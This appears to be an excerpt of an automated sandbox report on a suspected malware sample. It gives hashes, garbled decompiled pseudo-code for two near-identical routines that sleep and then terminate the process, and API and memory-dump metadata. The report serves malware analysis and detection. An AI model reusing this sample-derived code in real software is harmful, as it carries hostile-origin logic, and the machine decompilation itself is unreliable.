                  • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                  • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                  • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 17%
                  			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                  				void* _t8;
                  				void* _t11;
                  				intOrPtr* _t17;
                  				void* _t19;
                  				void* _t22;
                  
                  				_t23 = __eflags;
                  				asm("sbb ebx, ebp");
                  				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                  				_t17 =  *((intOrPtr*)(_t22 + 8));
                  				Sleep(0x1388);
                  				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                  				if(_t11 != 0) {
                  					_push( *((intOrPtr*)(_t22 + 0x14)));
                  					_push( *((intOrPtr*)(_t22 - 4)));
                  					_push(_t11);
                  					_push(_t17); // executed
                  					L00401455(0x60, _t19, __edi); // executed
                  				}
                  				 *_t17(0xffffffff, 0); // executed
                  				_t17 = _t17 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                  				_pop(__edi);
                  				_pop(__esi);
                  				_pop(__ebx);
                  				__esp = __ebp;
                  				_pop(__ebp);
                  				return __eax;
                  			}








                  0x00401826
                  0x00401826
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x00401899
                  0x0040189e
                  0x0040189f
                  0x004018a0
                  0x004018a1
                  0x004018a1
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                  • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                  • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                  • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 20%
                  			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                  				void* _t10;
                  				void* _t13;
                  				intOrPtr* _t19;
                  				void* _t22;
                  				void* _t25;
                  
                  				_t26 = __eflags;
                  				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                  				_t19 =  *((intOrPtr*)(_t25 + 8));
                  				Sleep(0x1388);
                  				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                  				if(_t13 != 0) {
                  					_push( *((intOrPtr*)(_t25 + 0x14)));
                  					_push( *((intOrPtr*)(_t25 - 4)));
                  					_push(_t13);
                  					_push(_t19); // executed
                  					L00401455(0x60, _t22, __edi); // executed
                  				}
                  				 *_t19(0xffffffff, 0); // executed
                  				_t19 = _t19 + 0x60;
                  				_push(0x60);
                  				asm("pushad");
                  				__ecx =  *__esp;
                  				__esp = __esp + 4;
                  				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                  				_pop(__edi);
                  				_pop(__esi);
                  				_pop(__ebx);
                  				__esp = __ebp;
                  				_pop(__ebp);
                  				return __eax;
                  			}








                  0x00401834
                  0x00401839
                  0x0040183e
                  0x00401846
                  0x00401854
                  0x0040185b
                  0x0040185d
                  0x00401860
                  0x00401863
                  0x00401864
                  0x00401865
                  0x00401865
                  0x0040186e
                  0x0040187a
                  0x0040188a
                  0x0040188b
                  0x0040188c
                  0x0040188f
                  0x00401899
                  0x0040189e
                  0x0040189f
                  0x004018a0
                  0x004018a1
                  0x004018a1
                  0x004018a2

                  APIs
                  • Sleep.KERNELBASE(00001388), ref: 00401846
                  • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.408548750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_utisvaa.jbxd
                  Similarity
                  • API ID: ProcessSleepTerminate
                  • String ID:
                  • API String ID: 417527130-0
                  • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                  • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                  • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                  • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                  Uniqueness

                  Uniqueness Score: -1.00%